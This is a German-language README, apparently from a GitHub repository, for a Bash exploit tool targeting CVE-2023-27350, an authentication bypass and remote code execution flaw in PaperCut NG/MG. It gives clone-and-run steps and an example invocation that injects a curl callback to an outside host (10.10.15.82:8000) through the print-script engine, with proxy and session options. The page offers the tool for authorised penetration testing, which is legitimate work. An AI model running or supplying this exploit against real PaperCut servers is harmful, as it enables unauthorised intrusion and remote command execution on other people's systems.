
PaperCut NG/MG Authentication Bypass- und Remote-Code-Ausführungs-Exploit-Tool. Eine eigenständige Bash-Implementierung der PaperCut-Exploit-Kette mit optionaler Proxy-Unterstützung, automatisierter Sitzungserweiterung und dynamischer Befehlsinjektion über die Druck-Skript-Engine. Entwickelt für Sicherheitsaudits und autorisierte Penetrationstests.

Ein optimierter Bash-Exploit für CVE-2023-27350. Dieses Skript automatisiert die Authentifizierungsumgehung, die Umgebungsvorbereitung und die Befehlseinschleusung über die PaperCut-Druckerskript-Engine.


# Repository klonen
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# In das Verzeichnis wechseln
cd CVE-2023-27350
# Skript ausführbar machen
chmod +x rce.sh
# Exploit ausführen (Beispiel mit Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : Ziel-URL (z. B. http://10.129.x.x:9191)-c : Auszuführender Befehl (in Anführungszeichen)-x : (Optional) Proxy-URL (z. B. http://10.129.x.x:3128)